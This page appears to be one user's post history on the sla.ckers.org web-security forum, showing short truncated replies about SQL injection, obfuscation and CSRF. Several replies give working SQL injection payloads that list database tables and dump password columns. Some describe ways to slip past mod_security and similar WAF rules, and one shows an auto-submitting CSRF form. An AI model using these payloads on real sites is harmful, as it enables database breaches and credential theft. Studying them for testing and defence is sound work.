Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
This group should mostly be dealing with how web applications enable networking security issues that are otherwise not there. Everything is being tunneled over port 80 now so what does that enable and how do we fix it? 

Pages: 12345...LastNext
Current Page: 1 of 24
Results 1 - 30 of 705
1 year ago
Reiners
netpumber Wrote: ------------------------------------------------------- > I thought that my query was executed without an > error and that's why it happened. > Let's create an error > > .asp?id=8+convert(int,(select table_name from > information_schema.tables))-- > > RETURNED: > > Microsoft OLE DB Provider for SQL Server error > '80040e14' > Inc
Forum: SQL and Code Injection
1 year ago
Reiners
Sr.Gr33n Wrote: ------------------------------------------------------- > 1 and (/*!50000 Select count(*) from*/ COLLATION) > = 1 -- > > and I can't see the webpage... and It's strange > because COLLATION is a table that ever exists... as a side note: table COLLATION exists in the database information_schema, so you better specify it if you want to access it: select
Forum: SQL and Code Injection
2 years ago
Reiners
yes (if you can taint it)
Forum: SQL and Code Injection
2 years ago
Reiners
welcome mrkenobi
Forum: Intro
2 years ago
Reiners
obviously the GET parameter "root" is split on "_". so "shared_0" becomes "WHERE file_root_type = 'shared' AND file_root_ID = 0". if you put "and 1=2" the query may return nothing, but the application can still decide to display default values or something. Try to avoid spaces with /**/: root=shared_0/**/order/**/by/**/10--%09-
Forum: SQL and Code Injection
2 years ago
Reiners
it is probably not vulnerable to SQL injection. note the escaped single quote. is the backslash \ escaped too ? PS: although your description is not that detailed it is nice to see a thread again without "please hack http://url/".
Forum: SQL and Code Injection
2 years ago
Reiners
it means that you have successfully appended the GET parameter apos :P
Forum: SQL and Code Injection
2 years ago
Reiners
you could batch the process of 1) extract all files from the jar (any unzip software will do) 2) decompile all class files (with JAD or JavaDecompiler) 3) run a static analysis tool on all files (like "findbugs", I haven't tested any java sca tools)
Forum: SQL and Code Injection
2 years ago
Reiners
you mean this tool with the red button to own every website? I sell it for only 50$
Forum: SQL and Code Injection
2 years ago
Reiners
<form action=url method=post> <input type="hidden" name="param" value="xss"> </form> <script>document.forms[0].submit()</script>
Forum: SQL and Code Injection
2 years ago
Reiners
MySQL 5: '||(true)#1' '||true#' '=true UNION# # # #original_by_lightos SELECT \N,group_concat(password)# ## /*!FROM*/ users WHERE '1
Forum: Projects
2 years ago
Reiners
this might get you in the right direction http://sla.ckers.org/forum/read.php?24,37039
Forum: Obfuscation
2 years ago
Reiners
hi, glad you like it. btw, version 0.51 is already shipped https://websec.wordpress.com/2011/12/31/project-rips-v0-50-status/
Forum: Projects
2 years ago
Reiners
hm? it's a path traversal
Forum: SQL and Code Injection
2 years ago
Reiners
https://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/
Forum: SQL and Code Injection
2 years ago
Reiners
take the first eval and echo it. now change the eval inside to echo (luckily eval and echo have the same size =) and encode it back: Quote echo base64_encode(gzcompress("\$O000O0O00=fopen(\$OOO0O0O00,'rb');while(--\$O00O00O00)fgets(\$O000O0O00,1024);fgets(\$O000O0O00,4096);\$OO00O00O0=gzuncompress(base64_decode(strtr(fread(\$O000O0O00,480),'EnteryouwkhRHYKNWOUTAaBbCcDdFfGgIiJjLlMmPpQqSsVvX
Forum: Obfuscation
2 years ago
Reiners
unfortunetly you can not encode the table name in any way.
Forum: SQL and Code Injection
3 years ago
Reiners
@Albino: the new url is https://phpids.org/
Forum: Projects
3 years ago
Reiners
@mssql: yes you can @site: glad you liked the blogposts =) I honestly recommend to reconstruct the filter by fuzzing the keywords allowed/denied and find a bypass step by step with a locally installed instance of mysql. I won't participate, sry.
Forum: SQL and Code Injection
3 years ago
Reiners
assuming from your commands we speak about mysql and you cannot use stacked queries on mysql. that means you can alter the statement you are injecting to but you can not query different statement.
Forum: SQL and Code Injection
3 years ago
Reiners
document.forms[0].submit() ?
Forum: CSRF and Session Info
3 years ago
Reiners
you could discover your own ways and have look whats inside the information_schema database (http://www.xcdsql.org/MySQL/information_schema/5.1/MySQL_5_1_INFORMATION_SCHEMA.html) or just dont learn anything and use this: // databases select group_concat(schema_name) from information_schema.schemata // tables for 'database' select group_concat(table_name) from information_schema.tables whe
Forum: SQL and Code Injection
3 years ago
Reiners
blind SQLi is fine too as long as you can extract the data without triggering any alert.
Forum: Obfuscation
3 years ago
Reiners
http://websec.wordpress.com/2007/11/17/mysql-table-and-column-names/
Forum: SQL and Code Injection
3 years ago
Reiners
select tablename from pg_tables where schemaname = 'the database name you found out'
Forum: SQL and Code Injection
3 years ago
Reiners
I dont know.
Forum: SQL and Code Injection
3 years ago
Reiners
1. WAFs to bypass: mod_security, greensql, phpids 2. null: often used in "union select null,null,null..." for type-independed place holders for a column (the amount depends on the amount of columns in the original select query). ?id=null is the same as ?id=-1 or ?id=1 and 1=0, you want to achieve that the original SELECT query returns nothing and therefore you choose a WHERE condition t
Forum: SQL and Code Injection
3 years ago
Reiners
of course you need to fill the 3rd parameter as well "INSERT INTO table VALUES ('$_POST','$_POST','5')" test1=a',(subselect),'5')-- -
Forum: SQL and Code Injection
3 years ago
Reiners
@Skyphire: I'm absolutely with you, but thats what they do. modsecurity-crs_2.2.0/base_rules/modsecurity_crs_41_sql_injection_attacks.conf SecRule REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "\bselect\b.{0,40}\bsubstring\b" \ select 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,substring(table_name,1,1)
Forum: SQL and Code Injection
3 years ago
Reiners
dont get confused with this 0xAAA stuff. A lot of filters (including mod_security) simply have rules like "select.{40}from" meaning that 40 or more characters between the keywords will not match the rule. you dont necessarily trigger a BoF if a bypass works like this ;)
Forum: SQL and Code Injection
Pages: 12345...LastNext
Current Page: 1 of 24